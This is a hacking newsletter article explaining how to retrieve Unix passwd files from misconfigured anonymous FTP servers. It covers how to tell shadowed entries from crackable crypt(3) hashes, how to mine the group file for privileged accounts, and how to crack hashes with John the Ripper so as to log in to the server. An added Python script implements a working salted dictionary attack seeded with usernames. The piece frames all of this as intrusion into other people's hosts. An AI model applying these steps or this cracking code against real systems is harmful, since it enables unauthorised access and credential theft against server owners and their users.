HBH Newsletter


New Skills Section:


How To Get A Passwd File

WHAT:
It is easy to get hold of a passwd (password) file, but it is harder to get a "Good One".
Yes, a good one: a passwd file that actually contains the password hashes rather than a placeholder for every account. There is only one kind worth having, and that is the "Good One".

HOW:
The oldest method I know is anonymous FTP: point your browser at ftp://server.com/.
*Note: do this from your browser, not from an FTP client program, so the directory listing comes up as clickable links.*
The browser logs in to the server anonymously, and if the server allows it you will see something like this:

FTP Dir on server.com
---------------------
04/07/1999 12:00 Directory dev | =--- Devices
04/12/1999 12:00 Directory etc | =--- This one you want!
06/10/1998 12:00 Directory hidden | =--- Not important
03/22/2000 02:23 Directory pub | =--- Public stuff

As you can see this is a Unix system *(Windows has no /etc/ directory)*.
So we click on --= etc

FTP Dir /etc on server.com
--------------------------
04/12/1999 12:00 601 group |=--- File with group/user names
04/12/1999 12:00 509 passwd |=--- Bingo!

So we click on the passwd file.
We see something like this:

root:x:0:1:Super-User:/:/sbin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:

WHAT: This one is useless. The x in the second field means the password is "shadowed": the real hash has been moved to /etc/shadow, which only root can read, and the x is nothing but a placeholder.
A shadowed passwd file cannot be cracked, because there is nothing in it to crack: no program can recover a hash from an x. Tools such as Deshadow (or unshadow, which ships with John the Ripper) only merge a passwd file with a shadow file you already possess.
That is why Deshadow is only any use on your own Unix box, where you already have root and can read /etc/shadow.

root:x:0:1:Super-User:/:/sbin/bash

Field by field (colon-separated):
 1. root         login name
 2. x            shadowed passwd (placeholder; the real hash is in /etc/shadow)
 3. 0            user id (uid)
 4. 1            group id (gid)
 5. Super-User   full name / comment (the GECOS field)
 6. /            home dir
 7. /sbin/bash   shell (bash = Bourne Again Shell)

****
The "x" is just a token (placeholder). Other systems use a different token in the same place, commonly "*" or "!", though you may also meet "$", "#" or even the user name. Whatever the token is, it means the same thing: the hash is not in this file.
****
So now that the passwd file has turned out to be useless, we are disappointed, and just for the fun of it
we will take a look at the ---=group file.
We see something like this:

root::0:root
other::1:
bin::2:root,bin,daemon
sys::3:root,bin,sys,adm
adm::4:root,adm,daemon
uucp::5:root,uucp
mail::6:root
tty::7:root,tty,adm
lp::8:root,lp,adm
nuucp::9:root,nuucp
staff::10:
daemon::12:root,daemon
sysadmin::14:
nobody::60001:
noaccess::60002:
nogroup::65534:
sponsor::26:dlamb,marci,trs,wjtifft,sndesign,bswingle,sonny
star::22:nobody,trs,marci,dlamb,wjtifft,sndesign,bswingle,grossman
cron::30:root,rwisner,trs,grossman,bcauthor,starnews,kvoa,bswingle,uurtamo
nettools::29:root,rwisner,trs,grossman,bcauthor,bswingle,uurtamo
su::27:root,rwisner,trs,grossman,bcauthor,uurtamo,bswingle
ftp::60000:

What's to say? A bunch of user names and group ids (gid). Do not dismiss it, though: every name in it is a valid login on this host, and group names like su, sysadmin, cron and nettools hint at which accounts have elevated rights and are worth going after.
On BSD systems you will sometimes find a file called pwd.db in the /etc dir. It is the database form of the passwd file and holds no hashes either; those are in spwd.db, which only root can read.
Okay, our attempt to retrieve a good passwd file failed, so now we are going to get the "Good One".
* Note: Windows has no passwd file; on Windows 95/98 the nearest thing is the .pwl password list file. *
You can use the old FTP method on many servers, but let's talk about the good passwd file.
We use the same example as above:
We use the same example as above:

root:Npge08pfz4wuk:0:1:Super-User:/:/sbin/bash
daemon:Fs2e08p34Cxw1:1:1::/:
bin:Npge08pfz4wuk:2:2::/usr/bin:

What you should notice is the gibberish (Npge08pfz4wuk): it is the password hash.
It is not encrypted, and it is not encoded either: it is the output of crypt(3), a one-way function. It cannot be decoded or decrypted back into the password; it can only be guessed against, by hashing candidate passwords the same way and comparing the results.

-------PASSWD hash info---------
The password is hashed together with a randomly generated value called the salt.
The salt is two characters from a 64-character alphabet, so there are 64 x 64 = 4096 possible salt values. The salt is not secret: it is stored in the clear as the first two characters of the field. A dictionary attack therefore does not have to try all 4096 values; it reads the salt from the file and hashes each candidate word once per distinct salt. What the salt does achieve is that one precomputed table of hashed words cannot be compared against every account at once, since users with different salts have to be attacked separately.
So in Npge08pfz4wuk, Np is the salt and ge08pfz4wuk is the 11-character hash.
**********************************************************************
Right about now you will want to download John the Ripper. There is a great article on how to use it:
http://hellboundhackers.org/readarticle.php?article_id=45 "Its primary purpose is to detect weak UNIX passwords"
Use John the Ripper to crack the passwd file.
Each entry it cracks gives you the plaintext password of that account, which you can then use to log in to the server.
----------------------------------------------------------------------
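Putting the two halves of the article together, the group listing above (which supplies login names) and the salt/hash structure just described, here is an added example that is not part of the original article or of any tool it mentions. It parses passwd and group lines of the format shown, tells a shadowed x placeholder from a real crypt(3) field, reads the two-character salt from each hash, and runs a dictionary attack that hashes every word once per distinct salt rather than once per user or 4096 times. The passwd and group lines are constructed, not captured; the hashes are computed at run time with Python's crypt module (crypt(3) DES) when it is present and DES-capable, otherwise with a clearly labelled stand-in that only imitates crypt's output shape. The names standin_des_crypt, classify_pw, wordlist_from_groups and crack, and the sample passwords, are this example's own assumptions.

```python
import hashlib
import warnings
from collections import defaultdict

warnings.filterwarnings("ignore", category=DeprecationWarning)
try:
    import crypt as _crypt  # deprecated in Python 3.11, removed in 3.13
except ImportError:
    _crypt = None

# crypt(3) output alphabet: 64 symbols, so a 2-character salt has 64**2 = 4096 values.
CRYPT_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
SHADOW_TOKENS = {"x", "*", "!", "!!"}  # placeholders: hash kept elsewhere, or account locked

def real_des_crypt(word, salt):
    """crypt(3) DES via the stdlib; None when the module is gone or DES is compiled out."""
    try:
        out = _crypt.crypt(word, salt)  # AttributeError when _crypt is None
    except (AttributeError, OSError, ValueError):
        return None
    return out if out and len(out) == 13 and out.startswith(salt) else None  # "*0" = no DES

def standin_des_crypt(word, salt):
    """Assumed stand-in with crypt(3)'s shape (2-char salt + 11 symbols). NOT DES; it
    exists only so the example still runs where the crypt module is unavailable."""
    digest = hashlib.sha256((salt + ":" + word).encode()).digest()
    return salt + "".join(CRYPT_ALPHABET[b & 63] for b in digest[:11])

def classify_pw(pw):
    """What the second passwd field is telling you."""
    if pw == "":
        return "empty"      # no password at all
    if pw in SHADOW_TOKENS:
        return "shadowed"   # placeholder: the hash lives in root-only /etc/shadow
    if len(pw) == 13 and all(c in CRYPT_ALPHABET for c in pw):
        return "des-crypt"  # 2-char salt in the clear + 11-char hash
    return "other"          # e.g. $1$ MD5-crypt, or a lock marker such as *LK*

def parse_passwd(text):
    """One dict per line of user:pw:uid:gid:gecos:home:shell; malformed lines are rejected."""
    keys = ("user", "pw", "uid", "gid", "gecos", "home", "shell")
    entries = []
    for line in filter(str.strip, text.splitlines()):
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        entries.append(dict(zip(keys, fields)))
    return entries

def parse_group(text):
    """{group: [members]} from lines of group:pw:gid:member,member,..."""
    groups = {}
    for line in filter(str.strip, text.splitlines()):
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups

def wordlist_from_groups(groups):
    """Every member name once, in order: a login reused as its own password is an early guess."""
    return list(dict.fromkeys(m for members in groups.values() for m in members))

def crack(entries, wordlist, crypt_fn):
    """Salted dictionary attack. The salt is read from each hash, so a word is hashed once
    per *distinct salt*: not once per user, never 4096 times. Returns ({user: pw}, calls)."""
    by_salt = defaultdict(dict)  # salt -> {hash: [users sharing that exact hash]}
    for e in entries:
        if classify_pw(e["pw"]) == "des-crypt":
            by_salt[e["pw"][:2]].setdefault(e["pw"], []).append(e["user"])  # salt = first 2 chars
    found, calls = {}, 0
    for word in wordlist:
        for salt, hashes in by_salt.items():
            calls += 1
            for user in hashes.get(crypt_fn(word, salt), ()):
                found.setdefault(user, word)
    return found, calls

# Constructed group file, modelled on the article's listing.
SAMPLE_GROUP = """\
root::0:root
sys::3:root,bin,sys,adm
su::27:root,rwisner,trs,grossman,bcauthor,uurtamo,bswingle
"""

def build_sample_passwd(crypt_fn):
    """Constructed passwd file: root and bin share salt *and* password (identical hash
    fields, as in the article); trs uses its login name; daemon and lp are shadowed."""
    return "\n".join([
        "root:%s:0:1:Super-User:/:/sbin/bash" % crypt_fn("sunshine", "Np"),
        "daemon:x:1:1::/:",
        "bin:%s:2:2::/usr/bin:" % crypt_fn("sunshine", "Np"),
        "trs:%s:1001:10:Some User:/home/trs:/bin/sh" % crypt_fn("trs", "aZ"),
        "lp:x:71:8:Line Printer Admin:/usr/spool/lp:",
    ])

if __name__ == "__main__":
    # Prefer the real crypt(3); fall back to the stand-in when it is unusable here.
    crypt_fn = real_des_crypt if real_des_crypt("probe", "ab") else standin_des_crypt
    entries = parse_passwd(build_sample_passwd(crypt_fn))
    words = wordlist_from_groups(parse_group(SAMPLE_GROUP)) + ["password", "sunshine"]
    found, calls = crack(entries, words, crypt_fn)
    print("cracked:", found, "(%d crypt calls for %d words)" % (calls, len(words)))
```

Run it directly and note the crypt-call count: it is the number of words times the number of distinct salts (two here), not words times users and not words times 4096. The identical root and bin fields are also worth a look: two accounts with the same salt and the same hash have the same password, and one crypt call cracks both.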

Of course I have only shown one method of getting a passwd file.
To get a passwd file another way, you first need to find a hole in one of the services running on the host's ports.
By:Hack4u
Html Format by Anarcho-Hippie - HBHNewsletter 01